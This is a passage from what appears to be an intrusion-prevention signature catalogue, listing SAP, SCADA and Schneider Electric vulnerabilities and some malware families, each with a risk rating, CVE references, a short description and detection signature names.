Description: A vulnerability in SAP Solution Manager, version 7.2, which allows unauthenticated remote attackers to execute arbitrary OS commands due to the missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page.
Situation: HTTP_CS-SAP-Solution-Manager-Remote-Command-Execution
File-TextId_SAP-Solution-Manager-Missing-Authentication-Check-EEM-Servlet-Access
References:
CVE-2020-6207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6207
Back to top

SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow

About this vulnerability: A vulnerability in SAP SQL Anywhere
Risk: High
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP SQL Anywhere
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in SAP SQL Anywhere .NET Data Provider. The vulnerability is caused by insufficient boundary checks in the handling of column aliases. If an application allows untrusted input to be used as the column alias in an SQL query, by sending crafted requests to the application, an attacker can overflow a stack-based buffer. This could possibly lead to arbitrary code execution in the context of the application.
Situation: HTTP_CRL-SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow
References:
CVE-2014-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9264
OSVDB-115624
http://www.osvdb.org/115624
Back to top

SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow

About this vulnerability: A vulnerability in SAP SQL Anywhere
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP SQL Anywhere
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in SAP SQL Anywhere .NET Data Provider. The vulnerability is caused by insufficient boundary checks in the handling of malformed integers. If an application allows untrusted input to be used as an integer constant in an SQL query, by sending crafted requests to the application, an attacker can overflow a stack-based buffer. This could possibly lead to arbitrary code execution in the context of the application.
Situation: HTTP_CRL-SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow
References:
CVE-2014-9264
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9264
OSVDB-115627
http://www.osvdb.org/115627
Back to top

SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference

About this vulnerability: A vulnerability in SAP Sybase Event Stream Processor (ESP) Studio
Risk: High
First detected in: sgpkg-ips-592-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Event Stream Processor Studio
Type: Malfunction
Description: Six unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, a remote attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
Situation: Generic_CS-SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference
References:
CVE-2014-3457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3457
OSVDB-107276
http://www.osvdb.org/107276
OSVDB-107260
http://www.osvdb.org/107260
Back to top

SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability

About this vulnerability: A vulnerability in SAP Sybase Event Stream Processor (ESP)
Risk: High
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Event Stream Processor Studio
Type: Malfunction
Description: Two unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, an remote attacker can cause the service to terminate resulting in a denial of service condition.
Situation: Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability
References:
CVE-2014-3458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3458
OSVDB-107262
http://www.osvdb.org/107262
Back to top

SAP-Sybase-Event-Stream-Processor-Parse-Connection-Unsafe-Pointer-Dereference

About this vulnerability: A vulnerability in SAP Sybase Event Stream Processor (ESP)
Risk: Moderate
First detected in: sgpkg-ips-595-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Sybase Event Stream Processor Studio
Type: Malfunction
Description: Five unsafe pointer dereference vulnerabilities have been reported in SAP Sybase Event Stream Processor (ESP). These vulnerabilities are caused by the listening service accepting unsanitized pointers in XMLRPC requests. By sending crafted requests to a vulnerable server, an remote attacker can leverage this vulnerability to execute arbitrary code under the context of the current process.
Situation: Generic_CS-SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Unsafe-Pointer-Dereference
References:
CVE-2014-3457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3457
OSVDB-107270
http://www.osvdb.org/107270
Back to top

SAPGUI-AddTab-Method-ActiveX-Control-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in SAP GUI
Risk: Moderate
First detected in: sgpkg-ips-198-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP GUI
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the SAP GUI. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially crafted web page. As a result of processing the malicious command, a heap-based buffer overflow can be triggered which may result in injection and execution of arbitrary code with privileges of the currently logged on user
Situation: HTTP_SAP-GUI-ActiveX-Control-Buffer-Overflow
File-Text_SAP-GUI-ActiveX-Control-Buffer-Overflow
References:
CVE-2008-4827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4827
BID-33148
http://www.securityfocus.com/bid/33148
Back to top

SAP_SAP-License-Manager-2005-Buffer-Overflow

About this vulnerability: A vulnerability in SAP License Manager
Risk: High
First detected in: sgpkg-ips-237-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SAP License Manager
Type: Buffer Overflow
Description: NT_Naming_Service.exe in License Manager 2005 for SAP Business One 2005-A is vulnerable to a stack-based buffer overflow allowing for full system compromise by an unauthenticated user that has TCP/IP access to SAP's license service on TCP port 30000.
Situation: Generic_SAP-License-Manager-2005-Buffer-Overflow
Back to top

SAP_SAP-MaxDB-Remote-Arbitrary-Commands-Execution

About this vulnerability: A vulnerability in SAP MaxDB
Risk: High
First detected in: sgpkg-ips-140-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SAP MaxDB
Type: Input Validation
Description: A shell command injection vulnerability exists in MaxDB database service. The vulnerability can be triggered when the service processes malicious exec_sdbinfo SAP commands. An unauthenticated attacker can exploit this vulnerability by delivering a crafted request to the target host, resulting in command injection and execution with privileges of the affected MaxDB database service.
Situation: Generic_SAP-MaxDB-Remote-Arbitrary-Commands-Execution
References:
CVE-2008-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0244
BID-27206
http://www.securityfocus.com/bid/27206
Back to top

Sasfis-Bot

About this vulnerability: Sasfis Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Sasish is a Trojan that opens a backdoor and installs additional malicious content on the infected machine.
Situation: HTTP_CRL-Sasfis-Bot-Traffic
File-Text_Sasfis-Bot-Traffic
Back to top

Satan-Ransomware

About this vulnerability: Satan Ransomware
Risk: High
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Satan is a ransomware malware which spreads using EternalBlue exploit.
Situation: HTTP_CRL-Possible-Satan-Ransomware-File-Download
HTTP_CRL-Satan-Ransomware-C2-Traffic
Back to top

Satel-Iberia-SenNet-Command-Injection

About this vulnerability: A Satel Iberia SenNet Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Satel Iberia
Type: Malfunction
Description: A vulnerability in Satel Iberia SenNet Data Logger and Electricity Meters, multiple versions, which allows remote attackers to gain full access to the system by command injection.
Situation: Generic_CS-Satel-Iberia-SenNet-Command-Injection
References:
CVE-2017-6048
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6048
Back to top

Savant-Web-Server-Overflow

About this vulnerability: A Savant Web Server Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-797-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Savant Web Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Savant Web Server, version 3.1, which allows remote attackers to execute arbitrary code via a long HTTP GET request.
Situation: HTTP_CS-Savant-Web-Server-Overflow
References:
CVE-2002-1120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1120
BID-5686
http://www.securityfocus.com/bid/5686
OSVDB-9829
http://www.osvdb.org/9829
Back to top

SaveNow-Software

About this vulnerability: SaveNow software
Risk: Low
First detected in: sgpkg-ips-39-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SaveNow
Type: Misconfiguration
Description: SaveNow is a software that displays advertisements and may be considered unwanted software by some organizations.
Situation: HTTP_CSH-SaveNow-Activity
Back to top

SCADA-AspicManager-Denial-Of-Service

About this vulnerability: A vulnerability in SCADA AspicManager allowing denial of service.
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SCADA AspicManager
Type: Malfunction
Description: A vulnerability exists in SCADA AspicManager where an attacker can send a long HTTP response header causing a crash and the possiblility for remote code execution.
Situation: Generic_SS-SCADA-AspicManager-Denial-Of-Service
Back to top

ScadaBR-BruteForce-Password-Attack

About this vulnerability: A bruteforce password attack on ScadaBR web-based interface
Risk: High
First detected in: sgpkg-ips-627-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ScadaBR
Type: Brute Force
Description: A brute force attack vulnerability which can lead the the remote attacker gaining credential information for the host system.
Situation: HTTP_CRL-General-Client-Login-Attempt
HTTP_CRL-General-Client-Login-Attempt
Back to top

ScadaMobile-One-v2.5.2-Directory-Traversal

About this vulnerability: A vulnerability in ScadaMobile ONE v2.5.2
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ScadaMobile ONE v2.5.2
Type: Malfunction
Description: There is a directory traversal vulnerability in ScadaMobile ONE v2.5.2.
Situation: HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities
Back to top

Scadatec-Limited-Procyon-Buffer-Overflow

About this vulnerability: Scadatec Limited Procyon Buffer Overflow
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Scadatec Procyon
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Scadatec Limited Procyon versions before 1.14 which allows remote attackers to execute arbitrary code, via a long password, triggering an out-of-bounds read or write.
Situation: Telnet_CS-Scadatec-Limited-Procyon-Buffer-Overflow
Generic_CS-Scadatec-Limited-Procyon-Buffer-Overflow
References:
CVE-2011-3322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3322
BID-49480
http://www.securityfocus.com/bid/49480
OSVDB-75371
http://www.osvdb.org/75371
Back to top

Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection

About this vulnerability: A vulnerability in Schneider Electric APC Easy UPS On-Line Software
Risk: High
First detected in: sgpkg-ips-1590-5242
Last changed: sgpkg-ips-1590-5242
Platform: Generic
Software: Schneider Electric APC
Type: Input Validation
Description: A command injection vulnerability has been reported in Schneider Electric APC Easy UPS Online. The vulnerability is due to insufficient validation of user input in the getMacAddressByIP method. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary command execution under the security context of SYSTEM.
Situation: Generic_CS-Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection
References:
CVE-2023-29412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29412
Back to top

Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Directory Traversal
Description: Improper input validation of path names in the C-Gate service causes a vulnerability in Schneider Electric C-bus toolkit. A successful exploit allows an attacker to save certain files to arbitrary paths on the target system, possibly gaining access to execute arbitrary code.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal
References:
CVE-2021-22717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22717
Back to top

Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1420-5242
Last changed: sgpkg-ips-1420-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Insecure Configuration
Description: A vulnerability in Schneider Electric C-Bus Toolkit, versions 1.15.8 and prior, which allows remote attackers to bypass access control policy, due to improper handling local requests in the C-Gate service.
Situation: File-Text_Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability
References:
CVE-2021-22784
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22784
Back to top

Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Directory Traversal
Description: An arbitrary file delete vulnerability has been reported in Schneider Electric C-Bus Toolkit. The vulnerability is due to improper input validation in the FILE DELETE command of the C-Gate2 service. A remote attacker could exploit the vulnerability by sending a crafted request to the target service. Successful exploitation could result in arbitrary file delete in the context as NETWORK SERVICE, which could lead to denial-of-service conditions.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete
References:
CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399
Back to top

Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Directory Traversal
Description: Improper input validation in the FILE DOWNLOAD command of the C-Gate2 service causes a directory traversal vulnerability in Schneider C-Bus Toolkit. A succesful explot allows an attacker to access arbitrary files on the target system.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal
References:
CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399
Back to top

Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1665-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Schneider Electric C-Bus Toolkit. The vulnerability is due to improper input validation of the project name notation in the FILE UPLOAD command of the C-Gate2 service. A remote attacker could exploit the vulnerability by sending a crafted request to the target service. Successful exploitation could result in arbitrary file write under the security context as NETWORK SERVICE, which could potentially lead to the execution of arbitrary code.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal
References:
CVE-2023-5399
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5399
Back to top

Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit.
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Input Validation
Description: A vulnerability in Schneider Electric C-Bus Toolkit, versions 1.15.7 and before, which allows remote attackers to execute arbitrary code by sending a crafted request to the target server, due to the improper input validation of the path name and input file in the C-Gate2 service.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload
References:
CVE-2021-22719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22719
Back to top

Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure

About this vulnerability: A vulnerability in Schneider Electric C-Bus Toolkit
Risk: Moderate
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Platform: Generic
Software: Schneider Electric C-Bus Toolkit
Type: Directory Traversal
Description: Improper input validation of the path name in the C-Gate service causes an information disclosure vulnerability in Schneider Electric C-Bus Toolkit.
Situation: Generic_CS-Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure
References:
CVE-2021-22720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22720
Back to top

Schneider-Electric-ClearSCADA-DoS2

About this vulnerability: A vulnerability in Schneider Electric ClearSCADA
Risk: High
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1581-5242
Platform: Windows
Software: Schneider Electric ClearSCADA
Type: Malfunction
Description: A vulnerability exists in Schneider Electric ClearScada, where an attacker could send a custom HTTP request causing a denial of service condition.
Situation: HTTP_CSH-Schneider-Electric-ClearSCADA-DoS2
Back to top

Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing

About this vulnerability: A vulnerability in Schneider Electric ClearSCADA 2010
Risk: Moderate
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric ClearSCADA
Type: Integer Overflow
Description: A code execution vulnerability has been reported in Schneider Electric ClearSCADA. The vulnerability is due improper validation of a length parameter that is used to index an array in the OPF File parsing component. A remote attacker could exploit this vulnerability by enticing the target user to open a malicious file. In the case of successful exploitation, arbitrary attacker code would be executed in the security context of the target user.
Situation: File-Binary_Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing
References:
CVE-2014-0779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0779
OSVDB-103150
http://www.osvdb.org/103150
Back to top

Schneider-Electric-Ethernet-Module-Multiple-Services-Hardcoded-Credentials

About this vulnerability: A vulnerability in Schneider Electric Ethernet Module
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric Ethernet Module
Type: Integer Overflow
Description: Multiple Schneider Electric Ethernet Module services use hardcoded credentials which allows attackers to trivially access the program or system and gain privileged access.
Situation: FTP_CS-Schneider-Electric-Ethernet-Module-Hardcoded-Credentials
References:
CVE-2011-4859
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4859
BID-51605
http://www.securityfocus.com/bid/51605
OSVDB-77705
http://www.osvdb.org/77705
Back to top

Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric GP-Pro EX
Risk: Moderate
First detected in: sgpkg-ips-744-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Schneider Electric GP-Pro EX
Type: Buffer Overflow
Description: A heap buffer overflow vulnerability caused by improper input validation in Schneider Electric GP-Pro EX can be exploited by means of a crafted project file to gain the ability to execute code with the privileges of the logged-on user.
Situation: File-Binary_Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow
Back to top

Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1606-5242
Last changed: sgpkg-ips-1606-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Input Validation
Description: Insufficient validation of user-supplied dashboard files causes an insecure deserialization vulnerability in Schneider Electric IGSS. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization
References:
CVE-2023-3001
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3001
Back to top

Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization

About this vulnerability: A vulnerability in Schneider Electric IGSS.
Risk: High
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Input Validation
Description: A vulnerability in Schneider Electric IGSS, versions 16.0.0.23040 and prior, which allows remote attackers to execute arbitrary code by enticing a user into opening a crafted dashboard file, due to insufficient validation of user-supplied dashboard files opened with the dashboard component of IGSS.
Situation: File-TextId_Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization
References:
CVE-2023-27978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27978
Back to top

Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: IGSS Server
Type: Buffer Overflow
Description: Improper processing of opcode 101 in the dc module causes a buffer overflow vulnerability in Schneider IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow
References:
CVE-2021-22824
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22824
Back to top

Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1443-5242
Platform: Generic
Software: IGSS Server
Type: Directory Traversal
Description: Improper input validation when processing opcode 60 in the dc module of Schneider Electric IGSS server causes a file deletion vulnerability. A successful exploit allows an attacker to cause a denial of service condition.
Situation: Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion
References:
CVE-2021-22823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22823
Back to top

Schneider-Electric-IGSS-dc.exe-Opcode-60-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Schneider Electric IGSS.
Risk: High
First detected in: sgpkg-ips-1443-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Directory Traversal
Description: A vulnerability in Schneider Electric IGSS, versions prior to 15.0.0.21321, which allows remote attackers to cause a denial of service condition by sending a crafted packet to the target system, due to an input validation when processing opcode 60 in dc module.
Situation: Generic_CS-Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion
References:
CVE-2021-22823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22823
Back to top

Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Directory Traversal
Description: Insufficient validation of user-supplied path in getRMSreportFile function causes a directory traversal vulnerability in Schneider Electric IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Text_Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal
References:
CVE-2023-27981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27981
Back to top

Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Schneider Electric IGSS.
Risk: High
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Schneider Electric IGSS, versions prior to 15.0.0.22020, which allows remote attackers to execute arbitrary code by sending a maliciously crafted packet to the target service, due to a buffer overflow when processing messages sent to the IGSSDataServer.exe process.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow
References:
CVE-2022-24313
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24313
Back to top

Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1488-5242
Last changed: sgpkg-ips-1488-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Malfunction
Description: Improper processing of Opcode 1 (Log) messages sent to the IGSSDataServer.exe process causes an out of bounds write vulnerability in Schneider Electric IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write
References:
CVE-2022-32522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32522
Back to top

Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: High
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1511-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Integer Overflow
Description: An integer overflow vulnerability exists in Schneider Electric IGSS. The vulnerability is due to input validation error when processing ALMNOTE opcode. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could cause denial-of-service and potentially remote code execution.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow
References:
CVE-2022-2329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2329
Back to top

Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Malfunction
Description: An out-of-bounds read vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due memory access error when processing messages sent to the IGSSdataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could allow the attacker to potentially cause the denial of service condition on the IGSS application.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read
References:
CVE-2022-24315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24315
Back to top

Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: High
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1541-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Malfunction
Description: An out-of-bounds write vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due to an out-of-bounds write when processing Opcode 5 (ONL) messages sent to the IGSSDataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending a maliciously crafted packet to the target service. Successful exploitation could allow the attacker to potentially execute arbitrary code on the target system in the context of the IGSSDataServer process.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write
References:
CVE-2022-32524
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32524
Back to top

Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: High
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1541-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Malfunction
Description: An out-of-bounds write vulnerability has been reported in Schneider Electric IGSS. This vulnerability is due to an out-of-bounds write when processing Opcode 6 (HDM) messages sent to the IGSSDataServer.exe process. A remote, unauthenticated attacker could exploit this vulnerability by sending maliciously crafted packets to the target service. Successful exploitation could allow the attacker to potentially execute arbitrary code on the target system in the context of the IGSSDataServer process.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write
References:
CVE-2022-32525
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32525
Back to top

Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IGSS Server
Type: Directory Traversal
Description: Improper handling of user-supplied paths in the IGSSupdateservice service causes a directory traversal vulnerability in Schneider Electric IGSS. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal
References:
CVE-2020-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7478
Back to top

Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write

About this vulnerability: A vulnerability in Schneider Electric IGSS
Risk: Moderate
First detected in: sgpkg-ips-1525-5242
Last changed: sgpkg-ips-1525-5242
Platform: Generic
Software: Schneider Electric IGSS
Type: Malfunction
Description: An out-of-bounds write when processing Opcode 2 (BCL) messages sent to the IGSSdataServer.exe process causes a vulnerability in Schneider IGSS. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write
References:
CVE-2022-32523
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32523
Back to top

Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal

About this vulnerability: A vulnerability in Schneider Electric IIoT Monitor
Risk: Moderate
First detected in: sgpkg-ips-1148-5242
